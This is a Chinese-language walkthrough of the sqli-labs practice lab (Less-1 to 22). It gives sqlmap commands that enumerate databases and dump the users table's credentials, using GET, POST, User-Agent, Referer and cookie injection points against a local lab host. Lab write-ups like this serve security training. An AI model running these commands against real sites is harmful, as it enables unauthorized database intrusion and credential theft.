1. Less-1

(1) 查看数据库

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -dbs

得到这几个数据库

(2) 查看数据表

比如我们想看security这个数据库下有什么表

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -D security --tables 

(3) 查看表中字段

我们看users表下的字段内容

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -D security -T users --columns

(4) 查看字段值

查看security数据库下的users表里的idpasswordusername有哪些值

1
sqlmap -u http://192.168.1.3/sql-libs/Less-1/?id=1 -D security -T users --columns id,password,username --dump

第一题结束

2. Less-2

和第一题一样。套代码就行了.

1
2
3
4
sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -dbs
sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -D security --tables
sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -D security -T users --columns
sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -D security -T users --columns id,password,username --dump

3. Less-3

1
2
3
4
sqlmap -u "http://192.168.1.3/sql-libs/Less-3/?id=1" -dbs
sqlmap -u "http://192.168.1.3/sql-libs/Less-3/?id=1" -D security --tables
sqlmap -u "http://192.168.1.3/sql-libs/Less-3/?id=1" -D security -T users --columns
sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -D security -T users --columns id,password,username --dump

4. Less-4

一样……

5. Less-5

一样……

6. Less-6

一样……

7. Less-7

一样……

8. Less-8

一样……

9. Less-9

一样……

10. Less-10

出现了一些变化

套路不好使了,我们试试level2

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-10/?id=1" -level=2 -dbs

后面就一样了,加上 -level=2 就行了。

11. Less-11

11题是一个登录界面,需要使用--data来定义payload的内容

先抓包找一下参数

有这三个参数

这道题不用加id

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" --dbs

剩下的简单了。

加上 --data "uname=1&passwd=11&submit=Submit"就行了

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" -D security -T users id,password,username -dump

12. Less-12

和11题一样

13. Less-13

和11题一样

14. Less-14

和11题一样

15. Less-15

和11题一样,由于用到时间盲注,可能会很长时间

16. Less-16

套路不行,加-level=2

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" -D security -T users id,password,username -dump -level=2

17. Less-17

这道题已知账号是admin,其他和之前一样。

这道题我最后获取字段数据的时候,结果是NULL,然后用脚本跑出来了。

脚本在开头的那篇文章里。

18. Less-18

这道题的前提是知道账号和密码,要不然做不出来

账号:Dumb,密码:Dumb

这是一个header注入。注入点在UA里

得到数据库信息

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-18/" --data="uname=Dumb&passwd=Dumb、&submit=Submit" --user-agent="*" --thread=10 --dbs

其他的就一样了。

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-18/" --data="uname=Dumb&passwd=Dumb、&submit=Submit" --user-agent="*" --thread=10 -D security -T users --columns id,password,username --dump

如果得不到数据,或者报错就重刷数据库。

19. Less-19

这道题注入点在referer中

1
sqlmap -u "http://192.168.1.3/sql-libs/Less-19/" --data="uname=admin&passwd=admin&submit=Submit" --referer="*" --thread=10 --dbs

其他的也一样,改语句就行。

如果得不到数据,或者报错就重刷数据库。

20. Less-20

这道题注入点是在cookie

1
sqlmap -u http://192.168.1.3/sql-libs/Less-20/index.php --cookie="uname=admin" --dbs -level=2

其他的一样。

21. Less-21

还是cookie注入,但是用来base64编码。

我们用--tamper "base64encode.py"来加密。

1
sqlmap -u http://192.168.1.3/sql-libs/Less-21/index.php --cookie="uname=*" --dbs --tamper "base64encode.py" 

22. Less-22

和21题一样。